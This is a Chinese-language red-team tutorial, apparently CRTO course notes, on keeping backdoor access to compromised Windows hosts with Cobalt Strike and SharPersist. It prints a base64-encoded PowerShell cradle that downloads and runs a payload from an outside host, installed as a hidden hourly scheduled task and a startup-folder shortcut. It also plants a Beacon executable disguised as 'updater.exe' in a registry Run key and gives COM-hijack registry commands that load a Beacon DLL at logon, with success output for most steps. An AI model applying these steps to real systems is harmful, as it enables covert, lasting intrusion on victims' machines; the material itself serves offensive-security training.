一、概述
二、计划任务
三、启动文件夹
四、注册表自动运行
五、COM劫持
本章主要是通过计划任务、启动文件夹、注册表自动运行、COM劫持等方法进行持久化后门安装
一、概述
简单来说持久化就是开后门,目标机器重启或者漏洞修补后仍可以继续控制,比如通过钓鱼获得初始权限后,如果没做持久化Beacon 丢失可能就很难再次获得,安装持久化通常需要进行一些配置更改或将后门写入磁盘,一方面持久化具有很高的检测风险,另一方面在长期渗透中非常有用(实际上是必不可少的),因此需要在保持控制和被发现之间进行平衡
持久化可以在用户权限(例如以当前用户身份)或在提权后(例如 SYSTEM)执行。提权后的持久化要求我们首先成为主机上的本地管理员,如何提权将在接下来“特权提升”章节中介绍
常见的用户空间持久化方法包括:
1、HKCU/HKLM 注册表自动运行
2、计划任务
3、启动文件夹
Cobalt Strike 不包含任何专门用于持久化的内置命令
SharPersist是FireEye编写的 Windows 持久化工具包,它用 C# 编写,因此可以通过execute-assembly执行
二、计划任务
Windows 计划任务允许我们创建在预定触发器上执行的“任务”。该触发器可以是一天中的某个时间、用户登录时、计算机空闲时、计算机锁定时,或者上述情况的组合
例如创建一个计划任务,每小时执行一次 PowerShell 有效负载
为了避免在 IEX 命令中处理大量引号,可以将其编码为 base64,然后使用PowerShell 中的-EncodedCommand参数执行它(简写为-enc),注意必须使用 Unicode 编码(而不是 UTF8 或 ASCII),在 PowerShell 中:
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA
或在Linux中:
ubuntu@DESKTOP-3BSK7NO ~> set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
ubuntu@DESKTOP-3BSK7NO ~> echo -en $str | iconv -t UTF-16LE | base64 -w 0
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA
然后在Cobalt Strike客户端中执行
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly
[*] INFO: Adding scheduled task persistence
[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] INFO: Command Args: -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA
[*] INFO: Scheduled Task Name: Updater
[*] INFO: Option: hourly
[+] SUCCESS: Scheduled task added
其中:
-t是所需的持久性技术
-c是需要执行的命令
-a是该命令的任何参数
-n是任务的名称
-m是参数add是添加任务(也可以remove、check和list)
-o是任务频率
登录Workstation 2机器,打开计划任务程序,在左侧菜单中选择任务计划程序库,可以看到新加的任务在主窗口中,可以等待一个小时,或者在该任务上点击右侧菜单中的运行,就会上线一个新的Beacon
三、启动文件夹
用户每次登录时,启动文件夹中的应用程序、文件和快捷方式会自动启动,通常用来引导用户的环境配置(设置壁纸、快捷方式等),可以通过Cobalt Strike客户端中执行
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add
[*] INFO: Adding startup folder persistence
[*] INFO: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] INFO: Command Args: -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA
[*] INFO: File Name: UserEnvSetup
[+] SUCCESS: Startup folder persistence created
[*] INFO: LNK File located at: C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserEnvSetup.lnk
[*] INFO: SHA256 Hash of LNK file: B34647F8D8B7CE28C1F0DA3FF444D9B7244C41370B88061472933B2607A169BC
其中:
-f是要保存的文件名
登录Workstation 2 查看 C:\Users\bfarmer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ 中文件,注销后重新登录看效果
四、注册表自动运行
HKCU 和 HKLM 中的 AutoRun 值允许应用程序在开机时启动,通常这些值用于启动本机和第三方应用程序,例如软件更新程序、下载助手、驱动程序实用程序等
beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
[*] INFO: Adding registry persistence
[*] INFO: Command: C:\ProgramData\Updater.exe
[*] INFO: Command Args: /q /n
[*] INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[*] INFO: Registry Value: Updater
[*] INFO: Option:
[+] SUCCESS: Registry persistence added
其中:
-k是需要修改的注册表项
-v是要创建的注册表项的名称
重启后测试效果
注意:
1、HKLM 自动运行并不是以 SYSTEM 身份执行有效负载
2、只有当配置单元的所有者登录到计算机时,HKCU 自动运行才会触发
3、当任何用户登录到计算机时,HKLM 自动运行都会触发,但它仍以用户帐户权限运行
五、COM劫持
尽量不要劫持正在使用的 COM 对象,这会破坏依赖它们的应用程序运行,可能暴露攻击行为
尽量找试图加载实际上不存在的对象(所谓的“废弃”键)的应用程序,这是一种更安全的策略
可以使用进程监视器(Sysinternals Suite工具之一),它可以显示实时文件系统、注册表和进程活动,在查找不同类型的特权升级方面非常有用,首先在自己的机器上寻找劫持,然后在实际目标上利用它们,在Attacker Desktop虚拟机上启动procmon64.exe
筛选如下操作:
1、RegOpenKey 操作
2、结果为NAME NOT FOUND
3、并且路径以InprocServer32结尾
为了加快收集速度,可以进行一些常规操作,比如单击任意内容、进入 Windows 菜单、启动应用程序等。大约一分钟有大约 500 个事件,其中大部分来自 Explorer,一些来自第三方软件,其他来自 OS 组件
需要注意的是特定 CLSID 的加载次数,如果劫持了一个每隔几秒加载一次的 CLSID,那要付出很大代价了
所以最好去寻找一个加载频率不高或在打开常用应用程序(Word、Excel、Outlook 等)时加载的 CLSID
通过滚动浏览,发现一个 CLSID 正在由C:\Windows\System32\DllHost.exe加载
HKCU\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32
使用 PowerShell 命令检测该条目确实存在于 HKLM 中,但不存在于 HKCU 中
PS C:\Users\Attacker> Get-Item -Path "HKLM:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\System32\thumbcache.dll
ThreadingModel : Apartment
PS C:\Users\Attacker> Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32' because it does not exist.
利用此漏洞,可在 HKCU 中创建必要的注册表项,并将其指向 Beacon DLL,比如直接将其指向C:\Payloads\http_x64.dll
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"
PS C:\Users\Attacker> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
当DllHost.exe加载此 COM 条目时,一个 Beacon上线
要清理 COM 劫持只需从 HKCU 中删除注册表项并删除 DLL即可
另一个寻找可劫持 COM 组件的方法是计划任务程序,许多默认的 Windows 任务实际上使用自定义触发器来调用 COM 对象,而不是直接在磁盘上执行二进制文件,由于它们是通过计划任务程序执行的,因此更容易预测它们何时会被触发。我们可以使用以下 PowerShell 来查找兼容的任务
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
if ($Task.Principal.GroupId -eq "Users")
{
Write-Host "Task Name: " $Task.TaskName
Write-Host "Task Path: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
}
这个脚本很简单,输出结果如下:
Task Name: SystemSoundsService
Task Path: \Microsoft\Windows\Multimedia\
CLSID: {2DEA658F-54C1-4227-AF9B-260AB5FC3543}
Task Name: MsCtfMonitor
Task Path: \Microsoft\Windows\TextServicesFramework\
CLSID: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}
Task Name: Calibration Loader
Task Path: \Microsoft\Windows\WindowsColorSystem\
CLSID: {B210D694-C8DF-490D-9576-9E20CDBC20BD}
Task Name: CacheTask
Task Path: \Microsoft\Windows\Wininet\
CLSID: {0358B920-0AC7-461F-98F4-58E32CD89148}
在计划任务程序中查看MsCtfMonitor 任务,可以看到它是在任何用户登录时触发,可以起到有效的重启持久化作用
在HKEY_CLASSES_ROOT\CLSID中查找 {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} 项
PS C:\> Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\system32\MsCtfMonitor.dll
ThreadingModel : Both
可以看到InprocServer32,并且可以验证它在 HKLM 而不是 HKCU 中
PS C:\> Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
Name Property
---- --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
现在只需在 HKCU 中添加一个指向我们的 DLL 的重复条目(如上所示),每次用户登录时都会加载
#参考
标签:INFO,Task,持久,Windows,主机,exe,CLSID,CRTO,HKCU From: https://www.cnblogs.com/o-O-oO/p/18359369